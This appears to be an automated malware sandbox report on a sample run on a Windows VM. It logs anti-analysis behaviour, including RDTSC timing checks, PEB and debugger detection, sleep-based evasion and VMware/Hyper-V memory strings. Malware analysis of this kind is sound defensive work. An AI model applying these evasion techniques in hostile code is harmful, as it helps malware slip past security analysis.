Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_2-18201

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000129B6E second address: 0000000000129B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_5-13952

Source: C:\Windows\explorer.exe TID: 1660	Thread sleep count: 1944 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1660	Thread sleep time: -3888000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1660	Thread sleep count: 7997 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1660	Thread sleep time: -15994000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696	Thread sleep count: 2275 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696	Thread sleep time: -4550000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696	Thread sleep count: 7690 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696	Thread sleep time: -15380000s >= -30000s	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe TID: 1144	Thread sleep count: 95 > 30	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe TID: 1144	Thread sleep count: 88 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 4_2_00409AA0 rdtsc

4_2_00409AA0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1944	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7997	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 2275	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 7690	Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 16DDDC00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 16DF5C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 16DDD9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 16DF5F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FB5F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD0F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD3F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Memory allocated: 175FD470000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	API coverage: 1.4 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 2.1 %

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_013807DA GetSystemInfo,

2_2_013807DA

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00405EC2 FindFirstFileA,FindClose,	0_2_00405EC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004054EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00402671 FindFirstFileA,	0_2_00402671
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001C16A5 FindFirstFileExW,	2_2_001C16A5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001C16A5 FindFirstFileExW,	4_2_001C16A5

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

API call chain: ExitProcess graph end node

graph_0-3203

Source: explorer.exe, 00000005.00000000.1240160729.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000005.00000000.1233732811.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: rundll32.exe, 00000006.00000002.3699669578.0000000000486000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3699669578.00000000004DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000005.00000003.2274294266.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000002.3719591837.0000000007315000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000005.00000002.3728348444.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000003.2274294266.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000005.00000002.3728348444.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000005.00000002.3719591837.0000000007315000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000005.00000003.3196363751.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: rundll32.exe, 00000006.00000002.3699669578.00000000004D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}
Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000005.00000000.1233732811.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.1233732811.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_001B0828 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_001B0828

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

2_2_001A2015

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_001BE682 GetProcessHeap,

2_2_001BE682

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 4_2_00409AA0 rdtsc

4_2_00409AA0

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_0138013E mov eax, dword ptr fs:[00000030h]	2_2_0138013E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_01380109 mov eax, dword ptr fs:[00000030h]	2_2_01380109
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_0138017B mov eax, dword ptr fs:[00000030h]	2_2_0138017B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_0138005F mov eax, dword ptr fs:[00000030h]	2_2_0138005F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6154 mov eax, dword ptr fs:[00000030h]	4_2_015C6154
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6154 mov eax, dword ptr fs:[00000030h]	4_2_015C6154
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BC156 mov eax, dword ptr fs:[00000030h]	4_2_015BC156
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694164 mov eax, dword ptr fs:[00000030h]	4_2_01694164
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694164 mov eax, dword ptr fs:[00000030h]	4_2_01694164
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]	4_2_01654144
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]	4_2_01654144
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01654144 mov ecx, dword ptr fs:[00000030h]	4_2_01654144
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]	4_2_01654144
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]	4_2_01654144
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01658158 mov eax, dword ptr fs:[00000030h]	4_2_01658158
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]	4_2_0166E10E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F0124 mov eax, dword ptr fs:[00000030h]	4_2_015F0124
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01680115 mov eax, dword ptr fs:[00000030h]	4_2_01680115
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166A118 mov ecx, dword ptr fs:[00000030h]	4_2_0166A118
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166A118 mov eax, dword ptr fs:[00000030h]	4_2_0166A118
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166A118 mov eax, dword ptr fs:[00000030h]	4_2_0166A118
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166A118 mov eax, dword ptr fs:[00000030h]	4_2_0166A118
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016961E5 mov eax, dword ptr fs:[00000030h]	4_2_016961E5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F01F8 mov eax, dword ptr fs:[00000030h]	4_2_015F01F8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016861C3 mov eax, dword ptr fs:[00000030h]	4_2_016861C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016861C3 mov eax, dword ptr fs:[00000030h]	4_2_016861C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0163E1D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0163E1D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0163E1D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0163E1D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0163E1D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BA197 mov eax, dword ptr fs:[00000030h]	4_2_015BA197
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BA197 mov eax, dword ptr fs:[00000030h]	4_2_015BA197
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BA197 mov eax, dword ptr fs:[00000030h]	4_2_015BA197
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01600185 mov eax, dword ptr fs:[00000030h]	4_2_01600185
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01664180 mov eax, dword ptr fs:[00000030h]	4_2_01664180
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01664180 mov eax, dword ptr fs:[00000030h]	4_2_01664180
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167C188 mov eax, dword ptr fs:[00000030h]	4_2_0167C188
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167C188 mov eax, dword ptr fs:[00000030h]	4_2_0167C188
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]	4_2_0164019F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]	4_2_0164019F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]	4_2_0164019F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]	4_2_0164019F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C2050 mov eax, dword ptr fs:[00000030h]	4_2_015C2050
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EC073 mov eax, dword ptr fs:[00000030h]	4_2_015EC073
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646050 mov eax, dword ptr fs:[00000030h]	4_2_01646050
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]	4_2_015DE016
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]	4_2_015DE016
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]	4_2_015DE016
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]	4_2_015DE016
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01656030 mov eax, dword ptr fs:[00000030h]	4_2_01656030
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01644000 mov ecx, dword ptr fs:[00000030h]	4_2_01644000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BA020 mov eax, dword ptr fs:[00000030h]	4_2_015BA020
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BC020 mov eax, dword ptr fs:[00000030h]	4_2_015BC020
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016460E0 mov eax, dword ptr fs:[00000030h]	4_2_016460E0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016020F0 mov ecx, dword ptr fs:[00000030h]	4_2_016020F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BC0F0 mov eax, dword ptr fs:[00000030h]	4_2_015BC0F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C80E9 mov eax, dword ptr fs:[00000030h]	4_2_015C80E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BA0E3 mov ecx, dword ptr fs:[00000030h]	4_2_015BA0E3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016420DE mov eax, dword ptr fs:[00000030h]	4_2_016420DE
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016580A8 mov eax, dword ptr fs:[00000030h]	4_2_016580A8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016860B8 mov eax, dword ptr fs:[00000030h]	4_2_016860B8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016860B8 mov ecx, dword ptr fs:[00000030h]	4_2_016860B8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C208A mov eax, dword ptr fs:[00000030h]	4_2_015C208A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B80A0 mov eax, dword ptr fs:[00000030h]	4_2_015B80A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166437C mov eax, dword ptr fs:[00000030h]	4_2_0166437C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0169634F mov eax, dword ptr fs:[00000030h]	4_2_0169634F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
